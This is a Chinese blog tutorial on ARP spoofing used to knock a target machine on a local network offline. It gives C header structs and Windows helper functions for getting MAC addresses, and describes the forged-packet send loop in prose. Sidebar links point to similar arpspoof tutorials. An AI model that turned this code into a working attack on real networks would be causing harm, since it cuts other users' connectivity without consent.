局域网ARP断网攻击

最新推荐文章于 2023-12-13 13:32:25 发布
最新推荐文章于 2023-12-13 13:32:25 发布
阅读量279 收藏
点赞数
分类专栏: 黑客编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cz493354115/article/details/46521063
版权

本程序利用向局域网中的目标地址发送伪造的ARP数据包,目的是使目标主机上的ARP缓存中的网关IP对应的mac地址变为本机的mac地址,这样一来,在链路层的通信中,目标主机发给网关的数据就会发送给本机,也就不能上网了。

首先构造ARP数据包以及以太网首部:

<span style="font-size:14px;color:#003333;">//以太网首部
typedef struct ethdr
{
    unsigned char  eh_dst[6]; //目的MAC地址
    unsigned char  eh_src[6]; //源MAC地址
    unsigned short eh_type; //帧类型
}ETHDR,*PETHDR;


//ARP报文
typedef struct arphdr
{
    unsigned short  arp_hdr;    //2字节硬件类型
    unsigned short  arp_pro;    //2字节协议类型
    unsigned char   arp_hln;    //1字节硬件地址长度
    unsigned char   arp_pln;    //1字节协议地址长度
    unsigned short  arp_opt;    //2字节操作类型
    unsigned char   arp_sha[6]; //6字节发送端MAC地址
	unsigned char   arp_spa[4]; //4字节发送端IP地址
    unsigned char   arp_tha[6]; //6字节目的MAC地址
    unsigned char   arp_tpa[4]; //4字节目的IP地址	
}ARPHDR,*PARPHDR;</span>
其中伪造ARP数据包的关键就是arp_spa[4]字段。把它设为网关的地址。这样一来,这个数据包的发送端IP与MAC就分别变成了网关与本机MAC了。

那么如何根据目标IP获得目标主机的mac地址呢?这里用到SendARP函数,我们将它封装成为自己的函数:

<span style="font-size:14px;color:#003333;">BOOL GetDestMac(char *szDestIP,unsigned char *macaddr)
{
	u_char arDestMac[6] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
	ULONG ulLen = 6;
	//得到目标主机MAC地址
	if(SendARP(inet_addr(szDestIP), 0, (ULONG*)arDestMac, &ulLen) == NO_ERROR)
	{
		memcpy(macaddr,arDestMac,6);
		return TRUE;
	}
	return FALSE;
}</span>
得到了目标主机的MAC地址后,还需要获得本机的MAC地址,我们也将它封装成为一个函数: 

<span style="font-size:14px;color:#000099;">BOOL GetLocMac(unsigned char *macaddr)
{
	PIP_ADAPTER_INFO pAdapterInfo = NULL;
	ULONG ulLen = 0;
	GetAdaptersInfo(pAdapterInfo,&ulLen);
	pAdapterInfo = (PIP_ADAPTER_INFO)GlobalAlloc(GPTR, ulLen);
	// 取得本地适配器结构信息
	if(GetAdaptersInfo(pAdapterInfo,&ulLen) ==  ERROR_SUCCESS)
	{
		if(pAdapterInfo != NULL)
		{

			memcpy(macaddr, pAdapterInfo->Address, 6);		
			return TRUE;
		}
	}
	return FALSE;
}</span>

最后初始化ARP数据包,并且调用PacketSendPacket函数循环发送,这样目标主机就不能上网了。




doge677
关注
专栏目录
局域网断网攻击arp攻击
qq_41453632的博客
10-30 3251
什么是arp断网攻击     简单来说就是就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。再简单的说,只要对局域网下任一台主机进行arp攻击,那么就可以导致这台主机断网 需要的工具 kali  linux arpspoof  (k...
局域网断网攻击arp攻击
weixin_43578125的博客
06-17 2223
ARP攻击能够实现的技术前提有两个,一是作为攻击者的计算机需要和被攻击者的计算机在一个局域网中,二是作为攻击者的计算机需要知道被攻击者计算机的局域网IP。 环境:安装在VMware Workstation中的Kali Linux,我们需要在VMware的设置中将Kali的联网方式改为“桥接模式” 步骤: 需要安装arpspoof工具(目前的版本需要自己安装) apt-get install dsniff 完成安装后执行重启 reboot 查看arpspoof用法 arpspoof -h 会出现
python arp断网攻击_局域网arp断网攻击
weixin_39820177的博客
12-22 571
前言使用计算机时间稍长的人,大多经历过各种病毒泛滥的年代,当然现在也有很多病毒,只是现在的病毒已经很隐蔽了,而且行为也愈发的不可捉摸。我们今天记录一下,早些时候,经常遇到的arp断网攻击。通俗的讲,arp就是一个问路的协议,数据要到达某一个设备,必须要知道其对应的mac地址,如何知道呢?那就是广播一下,谁的地址是192.168.0.100?然后持有这个ip地址的人就会说:我在这里,我的mac是:1...
Kali linux 局域网arp断网攻击
weixin_44475281的博客
08-11 5209
Kali linux 局域网arp断网攻击 什么是arp断网攻击ARP断网攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。 首先,你需要将kali的IP地址调整至与被攻击电脑在同一网络,如果是VMware虚拟机需要设置网卡为桥接模......
网络安全专栏——局域网arp断网攻击
MZH
11-14 7820
本次实验主要是通过虚拟机上的ARP攻击使得自己的本机无法上网。 ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击
如何修复局域网ARP断网攻击-局域网断网攻击软件.docx
01-20
### 如何修复局域网ARP断网攻击 #### ARP攻击简介 ARP(Address Resolution Protocol)攻击是一种常见的局域网安全威胁,它通过篡改局域网内的ARP缓存表来实施中间人攻击(Man-in-the-Middle Attack),使得正常...
局域网ARP攻击是什么 局域网ARP断网攻击的解决方法
10-01
经常遭受到一些ARP断网攻击,另外一些电脑用户的电脑也时候会遭受APR攻击,下面为大家介绍下ARP攻击是什么以及ARP断网攻击解决办法
渗透测试实战之ARP欺骗攻击ARP断网攻击
爱玩游戏的黑客的博客
12-13 2539
渗透测试实战之ARP欺骗攻击ARP断网攻击
kali学习笔记——局域网arp断网攻击
热门推荐
淚笑的博客
06-02 1万+
什么是arp断网攻击    简单来说就是就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。再简单的说,只要对局域网下任一台主机进行arp攻击,那么就可以导致这台主机断网需要工具kali linuxnmaparpspoof(当然安装了kali...
ARP断网攻击
木鱼
01-25 2503
在之前的文章当中,我已经向大家介绍了关于ARP的欺骗原理。再进一步,将其中的原理运用到实战中去,又会有什么效果呢?ARP又可以给我们带来哪些具体的作用呢?毕竟实践要来支撑,我们之前学过的ARP欺骗原理。 我们默认黑客主机与受害者计算机已经在同一网段内(相同局域网下),比如说两台计算机已经连接到同一 Wi-Fi 信号内。只有这样才能保证在接下来的ip地址扫描与断网攻击有效。 1.1 nmap:批量扫描同局域网内的其他主机 首先使用目录:ifconfig,来查看黑客计算机在当前局域网下的ip地址。 从上
各种函数声明和定义模块
最新发布
09-16
各种函数声明和定义模块
湖北工业大学在河南2021-2024各专业最低录取分数及位次表.pdf
09-16
全国各大学在河北2021-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
1805.06605v2 DEFENSE-GAN.pdf
09-16
1805.06605v2 DEFENSE-GAN.pdf
【语音去噪】FIR和IIR低通+带通+高通语音信号滤波(含时域频域分析)【含Matlab源码 4943期】.mp4
09-16
Matlab领域上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 语音处理系列程序定制或科研合作方向:语音隐藏、语音压缩、语音识别、语音去噪、语音评价、语音加密、语音合成、语音分析、语音分离、语音处理、语音编码、音乐检索、特征提取、声源定位、情感识别、语音采集播放变速等;
java-ssm+jsp幼儿园管理系统实现源码(项目源码-说明文档)
09-16
管理员成功登录后台管理界面,选择“教师管理”,出现教师列表。在教师管理页面,管理员可以添加、修改、查询及删除教师信息。 项目关键技术 开发工具:IDEA 、Eclipse 编程语言: Java 数据库: MySQL5.7+ 后端技术:ssm 前端技术:jsp 关键技术:jsp、spring、ssm、MYSQL、MAVEN 数据库工具:Navicat、SQLyog
hadoop_3_2_0-yarn-resourcemanager-3.3.4-1.el7.x86_64.rpm
09-16
Ambari+Bigtop 一站式编译和部署解决方案 https://gitee.com/tt-bigdata/ambari-env
DelphiWebMVC-master.zip
09-16
delphi在web系统开发上没有像java或php 这样方便,对于一直使用delphi的工程师来说是个遗憾,因此使用delphi技术开发了一套Web框架,使用MVC模式,让工程师只需把精力放在模型与视图的设计上,让delphi开发web系统更方便。
东北农业大学在河南2021-2024各专业最低录取分数及位次表.pdf
09-16
全国各大学在河北2021-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
python第二次作业
09-16
python第二次作业
360 ARP防火墙:保障网络安全,防范ARP欺骗攻击
4. 防止局域网瘫痪:一旦有单台电脑受到ARP欺骗木马感染,360防火墙能够及时发现并隔离,防止攻击扩散,保护整个局域网的正常工作。 当遭遇ARP欺骗时,用户可能会遇到的症状包括频繁断网、软件故障、认证失败等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值